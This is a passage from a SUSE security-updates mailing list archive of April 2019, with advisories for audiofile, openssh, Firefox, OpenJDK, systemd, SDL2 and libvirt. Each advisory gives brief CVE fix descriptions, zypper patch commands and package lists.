ghostscript-x11-9.26a-23.19.1 ghostscript-x11-debuginfo-9.26a-23.19.1 libspectre-debugsource-0.2.7-12.6.1 libspectre1-0.2.7-12.6.1 libspectre1-debuginfo-0.2.7-12.6.1 References: https://www.suse.com/security/cve/CVE-2019-6116.html https://bugzilla.suse.com/1122319 From sle-security-updates at lists.suse.com Fri Apr 12 10:14:01 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 12 Apr 2019 18:14:01 +0200 (CEST) Subject: SUSE-SU-2019:0940-1: Security update for audiofile Message-ID: <20190412161401.64A06FD26@maintenance.suse.de> SUSE Security Update: Security update for audiofile ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0940-1 Rating: low References: #1100523 Cross-References: CVE-2018-13440 Affected Products: SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 SUSE Linux Enterprise Module for Desktop Applications 15 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for audiofile fixes the following issues: Security issue fixed: - CVE-2018-13440: Return AF_FAIL instead of causing NULL pointer dereferences later (bsc#1100523). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-940=1 - SUSE Linux Enterprise Module for Desktop Applications 15: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-940=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): audiofile-0.3.6-3.7.10 audiofile-debuginfo-0.3.6-3.7.10 audiofile-debugsource-0.3.6-3.7.10 audiofile-doc-0.3.6-3.7.10 - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64): audiofile-debuginfo-0.3.6-3.7.10 audiofile-debugsource-0.3.6-3.7.10 audiofile-devel-0.3.6-3.7.10 libaudiofile1-0.3.6-3.7.10 libaudiofile1-debuginfo-0.3.6-3.7.10 References: https://www.suse.com/security/cve/CVE-2018-13440.html https://bugzilla.suse.com/1100523 From sle-security-updates at lists.suse.com Fri Apr 12 13:10:27 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 12 Apr 2019 21:10:27 +0200 (CEST) Subject: SUSE-SU-2019:0941-1: moderate: Security update for openssh Message-ID: <20190412191027.13406FD26@maintenance.suse.de> SUSE Security Update: Security update for openssh ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0941-1 Rating: moderate References: #1090671 #1115550 #1119183 #1121816 #1121821 Cross-References: CVE-2019-6109 CVE-2019-6111 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS ______________________________________________________________________________ An update that solves two vulnerabilities and has three fixes is now available. Description: This update for openssh fixes the following issues: Security vulnerabilities addressed: - CVE-2019-6109: Fixed an character encoding issue in the progress display of the scp client that could be used to manipulate client output, allowing for spoofing during file transfers (bsc#1121816). - CVE-2019-6111: Properly validate object names received by the scp client to prevent arbitrary file overwrites when interacting with a malicious SSH server (bsc#1121821). Other issues fixed: - Fixed two race conditions in sshd relating to SIGHUP (bsc#1119183). - Returned proper reason for port forwarding failures (bsc#1090671). - Fixed SSHD termination of multichannel sessions with non-root users (bsc#1115550). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-941=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-941=1 - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-941=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): openssh-6.6p1-54.32.1 openssh-askpass-gnome-6.6p1-54.32.1 openssh-askpass-gnome-debuginfo-6.6p1-54.32.1 openssh-debuginfo-6.6p1-54.32.1 openssh-debugsource-6.6p1-54.32.1 openssh-fips-6.6p1-54.32.1 openssh-helpers-6.6p1-54.32.1 openssh-helpers-debuginfo-6.6p1-54.32.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): openssh-6.6p1-54.32.1 openssh-askpass-gnome-6.6p1-54.32.1 openssh-askpass-gnome-debuginfo-6.6p1-54.32.1 openssh-debuginfo-6.6p1-54.32.1 openssh-debugsource-6.6p1-54.32.1 openssh-fips-6.6p1-54.32.1 openssh-helpers-6.6p1-54.32.1 openssh-helpers-debuginfo-6.6p1-54.32.1 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): openssh-6.6p1-54.32.1 openssh-askpass-gnome-6.6p1-54.32.1 openssh-askpass-gnome-debuginfo-6.6p1-54.32.1 openssh-debuginfo-6.6p1-54.32.1 openssh-debugsource-6.6p1-54.32.1 openssh-fips-6.6p1-54.32.1 openssh-helpers-6.6p1-54.32.1 openssh-helpers-debuginfo-6.6p1-54.32.1 References: https://www.suse.com/security/cve/CVE-2019-6109.html https://www.suse.com/security/cve/CVE-2019-6111.html https://bugzilla.suse.com/1090671 https://bugzilla.suse.com/1115550 https://bugzilla.suse.com/1119183 https://bugzilla.suse.com/1121816 https://bugzilla.suse.com/1121821 From sle-security-updates at lists.suse.com Fri Apr 12 16:09:10 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sat, 13 Apr 2019 00:09:10 +0200 (CEST) Subject: SUSE-SU-2019:0336-2: important: Security update for MozillaFirefox Message-ID: <20190412220910.427A6FD26@maintenance.suse.de> SUSE Security Update: Security update for MozillaFirefox ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0336-2 Rating: important References: #1120374 #1122983 Cross-References: CVE-2018-18500 CVE-2018-18501 CVE-2018-18505 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for MozillaFirefox fixes the following issues: Security issues fixed: CVE-2018-18500: Fixed a use-after-free parsing HTML5 stream (boo#1122983). CVE-2018-18501: Fixed multiple memory safety bugs (boo#1122983). CVE-2018-18505: Fixed a privilege escalation through IPC channel messages (boo#1122983). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-336=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): MozillaFirefox-60.5.0esr-109.58.3 MozillaFirefox-branding-SLE-60-32.5.1 MozillaFirefox-debuginfo-60.5.0esr-109.58.3 MozillaFirefox-debugsource-60.5.0esr-109.58.3 MozillaFirefox-devel-60.5.0esr-109.58.3 MozillaFirefox-translations-common-60.5.0esr-109.58.3 libfreebl3-3.41.1-58.25.1 libfreebl3-32bit-3.41.1-58.25.1 libfreebl3-debuginfo-3.41.1-58.25.1 libfreebl3-debuginfo-32bit-3.41.1-58.25.1 libfreebl3-hmac-3.41.1-58.25.1 libfreebl3-hmac-32bit-3.41.1-58.25.1 libsoftokn3-3.41.1-58.25.1 libsoftokn3-32bit-3.41.1-58.25.1 libsoftokn3-debuginfo-3.41.1-58.25.1 libsoftokn3-debuginfo-32bit-3.41.1-58.25.1 libsoftokn3-hmac-3.41.1-58.25.1 libsoftokn3-hmac-32bit-3.41.1-58.25.1 mozilla-nss-3.41.1-58.25.1 mozilla-nss-32bit-3.41.1-58.25.1 mozilla-nss-certs-3.41.1-58.25.1 mozilla-nss-certs-32bit-3.41.1-58.25.1 mozilla-nss-certs-debuginfo-3.41.1-58.25.1 mozilla-nss-certs-debuginfo-32bit-3.41.1-58.25.1 mozilla-nss-debuginfo-3.41.1-58.25.1 mozilla-nss-debuginfo-32bit-3.41.1-58.25.1 mozilla-nss-debugsource-3.41.1-58.25.1 mozilla-nss-devel-3.41.1-58.25.1 mozilla-nss-sysinit-3.41.1-58.25.1 mozilla-nss-sysinit-32bit-3.41.1-58.25.1 mozilla-nss-sysinit-debuginfo-3.41.1-58.25.1 mozilla-nss-sysinit-debuginfo-32bit-3.41.1-58.25.1 mozilla-nss-tools-3.41.1-58.25.1 mozilla-nss-tools-debuginfo-3.41.1-58.25.1 References: https://www.suse.com/security/cve/CVE-2018-18500.html https://www.suse.com/security/cve/CVE-2018-18501.html https://www.suse.com/security/cve/CVE-2018-18505.html https://bugzilla.suse.com/1120374 https://bugzilla.suse.com/1122983 From sle-security-updates at lists.suse.com Fri Apr 12 16:10:34 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sat, 13 Apr 2019 00:10:34 +0200 (CEST) Subject: SUSE-SU-2019:0049-2: important: Security update for java-1_7_0-openjdk Message-ID: <20190412221034.23D54FD26@maintenance.suse.de> SUSE Security Update: Security update for java-1_7_0-openjdk ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0049-2 Rating: important References: #1101644 #1101645 #1101651 #1101656 #1112142 #1112143 #1112144 #1112146 #1112147 #1112152 #1112153 Cross-References: CVE-2018-13785 CVE-2018-16435 CVE-2018-2938 CVE-2018-2940 CVE-2018-2952 CVE-2018-2973 CVE-2018-3136 CVE-2018-3139 CVE-2018-3149 CVE-2018-3169 CVE-2018-3180 CVE-2018-3214 CVE-2018-3639 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes 13 vulnerabilities is now available. Description: This update for java-1_7_0-openjdk to version 7u201 fixes the following issues: Security issues fixed: - CVE-2018-3136: Manifest better support (bsc#1112142) - CVE-2018-3139: Better HTTP Redirection (bsc#1112143) - CVE-2018-3149: Enhance JNDI lookups (bsc#1112144) - CVE-2018-3169: Improve field accesses (bsc#1112146) - CVE-2018-3180: Improve TLS connections stability (bsc#1112147) - CVE-2018-3214: Better RIFF reading support (bsc#1112152) - CVE-2018-13785: Upgrade JDK 8u to libpng 1.6.35 (bsc#1112153) - CVE-2018-16435: heap-based buffer overflow in SetData function in cmsIT8LoadFromFile - CVE-2018-2938: Support Derby connections (bsc#1101644) - CVE-2018-2940: Better stack walking (bsc#1101645) - CVE-2018-2952: Exception to Pattern Syntax (bsc#1101651) - CVE-2018-2973: Improve LDAP support (bsc#1101656) - CVE-2018-3639 cpu speculative store bypass mitigation Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-49=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): java-1_7_0-openjdk-1.7.0.201-43.18.1 java-1_7_0-openjdk-debuginfo-1.7.0.201-43.18.1 java-1_7_0-openjdk-debugsource-1.7.0.201-43.18.1 java-1_7_0-openjdk-demo-1.7.0.201-43.18.1 java-1_7_0-openjdk-demo-debuginfo-1.7.0.201-43.18.1 java-1_7_0-openjdk-devel-1.7.0.201-43.18.1 java-1_7_0-openjdk-devel-debuginfo-1.7.0.201-43.18.1 java-1_7_0-openjdk-headless-1.7.0.201-43.18.1 java-1_7_0-openjdk-headless-debuginfo-1.7.0.201-43.18.1 References: https://www.suse.com/security/cve/CVE-2018-13785.html https://www.suse.com/security/cve/CVE-2018-16435.html https://www.suse.com/security/cve/CVE-2018-2938.html https://www.suse.com/security/cve/CVE-2018-2940.html https://www.suse.com/security/cve/CVE-2018-2952.html https://www.suse.com/security/cve/CVE-2018-2973.html https://www.suse.com/security/cve/CVE-2018-3136.html https://www.suse.com/security/cve/CVE-2018-3139.html https://www.suse.com/security/cve/CVE-2018-3149.html https://www.suse.com/security/cve/CVE-2018-3169.html https://www.suse.com/security/cve/CVE-2018-3180.html https://www.suse.com/security/cve/CVE-2018-3214.html https://www.suse.com/security/cve/CVE-2018-3639.html https://bugzilla.suse.com/1101644 https://bugzilla.suse.com/1101645 https://bugzilla.suse.com/1101651 https://bugzilla.suse.com/1101656 https://bugzilla.suse.com/1112142 https://bugzilla.suse.com/1112143 https://bugzilla.suse.com/1112144 https://bugzilla.suse.com/1112146 https://bugzilla.suse.com/1112147 https://bugzilla.suse.com/1112152 https://bugzilla.suse.com/1112153 From sle-security-updates at lists.suse.com Fri Apr 12 16:14:44 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sat, 13 Apr 2019 00:14:44 +0200 (CEST) Subject: SUSE-SU-2019:0425-2: important: Security update for systemd Message-ID: <20190412221444.70CF3FD26@maintenance.suse.de> SUSE Security Update: Security update for systemd ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0425-2 Rating: important References: #1125352 Cross-References: CVE-2019-6454 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for systemd fixes the following issues: Security vulnerability fixed: - CVE-2019-6454: Fixed a crash of PID1 by sending specially crafted D-BUS message on the system bus by an unprivileged user (bsc#1125352) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-425=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch): systemd-bash-completion-210-116.22.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): libgudev-1_0-0-210-116.22.1 libgudev-1_0-0-32bit-210-116.22.1 libgudev-1_0-0-debuginfo-210-116.22.1 libgudev-1_0-0-debuginfo-32bit-210-116.22.1 libgudev-1_0-devel-210-116.22.1 libudev-devel-210-116.22.1 libudev1-210-116.22.1 libudev1-32bit-210-116.22.1 libudev1-debuginfo-210-116.22.1 libudev1-debuginfo-32bit-210-116.22.1 systemd-210-116.22.1 systemd-32bit-210-116.22.1 systemd-debuginfo-210-116.22.1 systemd-debuginfo-32bit-210-116.22.1 systemd-debugsource-210-116.22.1 systemd-devel-210-116.22.1 systemd-sysvinit-210-116.22.1 typelib-1_0-GUdev-1_0-210-116.22.1 udev-210-116.22.1 udev-debuginfo-210-116.22.1 References: https://www.suse.com/security/cve/CVE-2019-6454.html https://bugzilla.suse.com/1125352 From sle-security-updates at lists.suse.com Mon Apr 15 07:10:15 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 15 Apr 2019 15:10:15 +0200 (CEST) Subject: SUSE-SU-2019:0950-1: moderate: Security update for SDL2 Message-ID: <20190415131015.6A08010128@maintenance.suse.de> SUSE Security Update: Security update for SDL2 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0950-1 Rating: moderate References: #1124799 #1124800 #1124802 #1124803 #1124805 #1124806 #1124824 #1124825 #1124826 #1124827 #1125099 Cross-References: CVE-2019-7572 CVE-2019-7573 CVE-2019-7574 CVE-2019-7575 CVE-2019-7576 CVE-2019-7577 CVE-2019-7578 CVE-2019-7635 CVE-2019-7636 CVE-2019-7637 CVE-2019-7638 Affected Products: SUSE Linux Enterprise Module for Desktop Applications 15 ______________________________________________________________________________ An update that fixes 11 vulnerabilities is now available. Description: This update for SDL2 fixes the following issues: Security issues fixed: - CVE-2019-7572: Fixed a buffer over-read in IMA_ADPCM_nibble in audio/SDL_wave.c.(bsc#1124806). - CVE-2019-7578: Fixed a heap-based buffer over-read in InitIMA_ADPCM in audio/SDL_wave.c (bsc#1125099). - CVE-2019-7576: Fixed heap-based buffer over-read in InitMS_ADPCM in audio/SDL_wave.c (bsc#1124799). - CVE-2019-7573: Fixed a heap-based buffer over-read in InitMS_ADPCM in audio/SDL_wave.c (bsc#1124805). - CVE-2019-7635: Fixed a heap-based buffer over-read in Blit1to4 in video/SDL_blit_1.c. (bsc#1124827). - CVE-2019-7636: Fixed a heap-based buffer over-read in SDL_GetRGB in video/SDL_pixels.c (bsc#1124826). - CVE-2019-7638: Fixed a heap-based buffer over-read in Map1toN in video/SDL_pixels.c (bsc#1124824). - CVE-2019-7574: Fixed a heap-based buffer over-read in IMA_ADPCM_decode in audio/SDL_wave.c (bsc#1124803). - CVE-2019-7575: Fixed a heap-based buffer overflow in MS_ADPCM_decode in audio/SDL_wave.c (bsc#1124802). - CVE-2019-7637: Fixed a heap-based buffer overflow in SDL_FillRect function in SDL_surface.c (bsc#1124825). - CVE-2019-7577: Fixed a buffer over read in SDL_LoadWAV_RW in audio/SDL_wave.c (bsc#1124800). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Desktop Applications 15: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-950=1 Package List: - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64): SDL2-debugsource-2.0.8-3.9.1 libSDL2-2_0-0-2.0.8-3.9.1 libSDL2-2_0-0-debuginfo-2.0.8-3.9.1 libSDL2-devel-2.0.8-3.9.1 References: https://www.suse.com/security/cve/CVE-2019-7572.html https://www.suse.com/security/cve/CVE-2019-7573.html https://www.suse.com/security/cve/CVE-2019-7574.html https://www.suse.com/security/cve/CVE-2019-7575.html https://www.suse.com/security/cve/CVE-2019-7576.html https://www.suse.com/security/cve/CVE-2019-7577.html https://www.suse.com/security/cve/CVE-2019-7578.html https://www.suse.com/security/cve/CVE-2019-7635.html https://www.suse.com/security/cve/CVE-2019-7636.html https://www.suse.com/security/cve/CVE-2019-7637.html https://www.suse.com/security/cve/CVE-2019-7638.html https://bugzilla.suse.com/1124799 https://bugzilla.suse.com/1124800 https://bugzilla.suse.com/1124802 https://bugzilla.suse.com/1124803 https://bugzilla.suse.com/1124805 https://bugzilla.suse.com/1124806 https://bugzilla.suse.com/1124824 https://bugzilla.suse.com/1124825 https://bugzilla.suse.com/1124826 https://bugzilla.suse.com/1124827 https://bugzilla.suse.com/1125099 From sle-security-updates at lists.suse.com Mon Apr 15 07:12:47 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 15 Apr 2019 15:12:47 +0200 (CEST) Subject: SUSE-SU-2019:0948-1: moderate: Security update for libvirt Message-ID: <20190415131247.16527FD1B@maintenance.suse.de> SUSE Security Update: Security update for libvirt ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0948-1 Rating: moderate References: #1081516 #1102604 #1112182 #1120813 #1125665 #1126325 #1127458 #1131595 Cross-References: CVE-2019-3840 CVE-2019-3886 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Desktop 12-SP4 ______________________________________________________________________________ An update that solves two vulnerabilities and has 6 fixes is now available. Description: This update for libvirt fixes the following issues: Security issue fixed: - CVE-2019-3840: Fixed a null pointer dereference vulnerability in virJSONValueObjectHasKey function which could have resulted in a remote denial of service via the guest agent (bsc#1127458). - CVE-2019-3886: Fixed an information leak which allowed to retrieve the guest hostname under readonly mode (bsc#1131595). Other issues addressed: - libxl: support Xen's max_grant_frames setting with maxGrantFrames attribute on the xenbus controller (bsc#1126325). - conf: added new 'xenbus' controller type - util: skip RDMA detection for non-PCI network devices (bsc#1112182). - qemu: don't use CAP_DAC_OVERRIDE capability if non-root (bsc#1125665). - qemu: fix issues related to restricted permissions on /dev/sev(bsc#1102604). - libxl: save current memory value after successful balloon (bsc#1120813). - libxl: Add support for soft reset. (bsc#1081516) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-948=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-948=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-948=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): libvirt-debugsource-4.0.0-8.9.1 libvirt-devel-4.0.0-8.9.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): libvirt-4.0.0-8.9.1 libvirt-admin-4.0.0-8.9.1 libvirt-admin-debuginfo-4.0.0-8.9.1 libvirt-client-4.0.0-8.9.1 libvirt-client-debuginfo-4.0.0-8.9.1 libvirt-daemon-4.0.0-8.9.1 libvirt-daemon-config-network-4.0.0-8.9.1 libvirt-daemon-config-nwfilter-4.0.0-8.9.1 libvirt-daemon-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-interface-4.0.0-8.9.1 libvirt-daemon-driver-interface-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-lxc-4.0.0-8.9.1 libvirt-daemon-driver-lxc-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-network-4.0.0-8.9.1 libvirt-daemon-driver-network-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-nodedev-4.0.0-8.9.1 libvirt-daemon-driver-nodedev-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-nwfilter-4.0.0-8.9.1 libvirt-daemon-driver-nwfilter-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-qemu-4.0.0-8.9.1 libvirt-daemon-driver-qemu-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-secret-4.0.0-8.9.1 libvirt-daemon-driver-secret-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-storage-4.0.0-8.9.1 libvirt-daemon-driver-storage-core-4.0.0-8.9.1 libvirt-daemon-driver-storage-core-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-storage-disk-4.0.0-8.9.1 libvirt-daemon-driver-storage-disk-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-storage-iscsi-4.0.0-8.9.1 libvirt-daemon-driver-storage-iscsi-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-storage-logical-4.0.0-8.9.1 libvirt-daemon-driver-storage-logical-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-storage-mpath-4.0.0-8.9.1 libvirt-daemon-driver-storage-mpath-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-storage-scsi-4.0.0-8.9.1 libvirt-daemon-driver-storage-scsi-debuginfo-4.0.0-8.9.1 libvirt-daemon-hooks-4.0.0-8.9.1 libvirt-daemon-lxc-4.0.0-8.9.1 libvirt-daemon-qemu-4.0.0-8.9.1 libvirt-debugsource-4.0.0-8.9.1 libvirt-doc-4.0.0-8.9.1 libvirt-libs-4.0.0-8.9.1 libvirt-libs-debuginfo-4.0.0-8.9.1 libvirt-lock-sanlock-4.0.0-8.9.1 libvirt-lock-sanlock-debuginfo-4.0.0-8.9.1 libvirt-nss-4.0.0-8.9.1 libvirt-nss-debuginfo-4.0.0-8.9.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 x86_64): libvirt-daemon-driver-storage-rbd-4.0.0-8.9.1 libvirt-daemon-driver-storage-rbd-debuginfo-4.0.0-8.9.1 - SUSE Linux Enterprise Server 12-SP4 (x86_64): libvirt-daemon-driver-libxl-4.0.0-8.9.1 libvirt-daemon-driver-libxl-debuginfo-4.0.0-8.9.1 libvirt-daemon-xen-4.0.0-8.9.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): libvirt-4.0.0-8.9.1 libvirt-admin-4.0.0-8.9.1 libvirt-admin-debuginfo-4.0.0-8.9.1 libvirt-client-4.0.0-8.9.1 libvirt-client-debuginfo-4.0.0-8.9.1 libvirt-daemon-4.0.0-8.9.1 libvirt-daemon-config-network-4.0.0-8.9.1 libvirt-daemon-config-nwfilter-4.0.0-8.9.1 libvirt-daemon-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-interface-4.0.0-8.9.1 libvirt-daemon-driver-interface-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-libxl-4.0.0-8.9.1 libvirt-daemon-driver-libxl-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-lxc-4.0.0-8.9.1 libvirt-daemon-driver-lxc-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-network-4.0.0-8.9.1 libvirt-daemon-driver-network-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-nodedev-4.0.0-8.9.1 libvirt-daemon-driver-nodedev-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-nwfilter-4.0.0-8.9.1 libvirt-daemon-driver-nwfilter-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-qemu-4.0.0-8.9.1 libvirt-daemon-driver-qemu-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-secret-4.0.0-8.9.1 libvirt-daemon-driver-secret-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-storage-4.0.0-8.9.1 libvirt-daemon-driver-storage-core-4.0.0-8.9.1 libvirt-daemon-driver-storage-core-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-storage-disk-4.0.0-8.9.1 libvirt-daemon-driver-storage-disk-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-storage-iscsi-4.0.0-8.9.1 libvirt-daemon-driver-storage-iscsi-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-storage-logical-4.0.0-8.9.1 libvirt-daemon-driver-storage-logical-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-storage-mpath-4.0.0-8.9.1 libvirt-daemon-driver-storage-mpath-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-storage-rbd-4.0.0-8.9.1 libvirt-daemon-driver-storage-rbd-debuginfo-4.0.0-8.9.1 libvirt-daemon-driver-storage-scsi-4.0.0-8.9.1 libvirt-daemon-driver-storage-scsi-debuginfo-4.0.0-8.9.1 libvirt-daemon-lxc-4.0.0-8.9.1 libvirt-daemon-qemu-4.0.0-8.9.1 libvirt-daemon-xen-4.0.0-8.9.1 libvirt-debugsource-4.0.0-8.9.1 libvirt-doc-4.0.0-8.9.1 libvirt-libs-4.0.0-8.9.1 libvirt-libs-debuginfo-4.0.0-8.9.1 References: https://www.suse.com/security/cve/CVE-2019-3840.html https://www.suse.com/security/cve/CVE-2019-3886.html https://bugzilla.suse.com/1081516 https://bugzilla.suse.com/1102604 https://bugzilla.suse.com/1112182 https://bugzilla.suse.com/1120813 https://bugzilla.suse.com/1125665 https://bugzilla.suse.com/1126325 https://bugzilla.suse.com/1127458 https://bugzilla.suse.com/1131595 From sle-security-updates at lists.suse.com Mon Apr 15 13:08:54 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 15 Apr 2019 21:08:54 +0200 (CEST) Subject: SUSE-SU-2018:4236-2: important: Security update for MozillaFirefox, mozilla-nspr and mozilla-nss Message-ID: <20190415190854.87FB0FD1B@maintenance.suse.de> SUSE Security Update: Security update for MozillaFirefox, mozilla-nspr and mozilla-nss ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:4236-2 Rating: important References: #1097410 #1106873 #1119069 #1119105 Cross-References: CVE-2018-0495 CVE-2018-12384 CVE-2018-12404 CVE-2018-12405 CVE-2018-17466 CVE-2018-18492 CVE-2018-18493 CVE-2018-18494 CVE-2018-18498 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes 9 vulnerabilities is now available. Description: This update for MozillaFirefox, mozilla-nss and mozilla-nspr fixes the following issues: Issues fixed in MozillaFirefox: - Update to Firefox ESR 60.4 (bsc#1119105) - CVE-2018-17466: Fixed a buffer overflow and out-of-bounds read in ANGLE library with TextureStorage11 - CVE-2018-18492: Fixed a use-after-free with select element - CVE-2018-18493: Fixed a buffer overflow in accelerated 2D canvas with Skia - CVE-2018-18494: Fixed a Same-origin policy violation using location attribute and performance.getEntries to steal cross-origin URLs - CVE-2018-18498: Fixed a integer overflow when calculating buffer sizes for images - CVE-2018-12405: Fixed a few memory safety bugs Issues fixed in mozilla-nss: - Update to NSS 3.40.1 (bsc#1119105) - CVE-2018-12404: Fixed a cache side-channel variant of the Bleichenbacher attack (bsc#1119069) - CVE-2018-12384: Fixed an issue in the SSL handshake. NSS responded to an SSLv2-compatible ClientHello with a ServerHello that had an all-zero random. (bsc#1106873) - CVE-2018-0495: Fixed a memory-cache side-channel attack with ECDSA signatures (bsc#1097410) - Fixed a decryption failure during FFDHE key exchange - Various security fixes in the ASN.1 code Issues fixed in mozilla-nspr: - Update mozilla-nspr to 4.20 (bsc#1119105) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-952=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): MozillaFirefox-60.4.0esr-109.55.1 MozillaFirefox-debuginfo-60.4.0esr-109.55.1 MozillaFirefox-debugsource-60.4.0esr-109.55.1 MozillaFirefox-devel-60.4.0esr-109.55.1 MozillaFirefox-translations-common-60.4.0esr-109.55.1 libfreebl3-3.40.1-58.18.1 libfreebl3-32bit-3.40.1-58.18.1 libfreebl3-debuginfo-3.40.1-58.18.1 libfreebl3-debuginfo-32bit-3.40.1-58.18.1 libsoftokn3-3.40.1-58.18.1 libsoftokn3-32bit-3.40.1-58.18.1 libsoftokn3-debuginfo-3.40.1-58.18.1 libsoftokn3-debuginfo-32bit-3.40.1-58.18.1 mozilla-nspr-32bit-4.20-19.6.1 mozilla-nspr-4.20-19.6.1 mozilla-nspr-debuginfo-32bit-4.20-19.6.1 mozilla-nspr-debuginfo-4.20-19.6.1 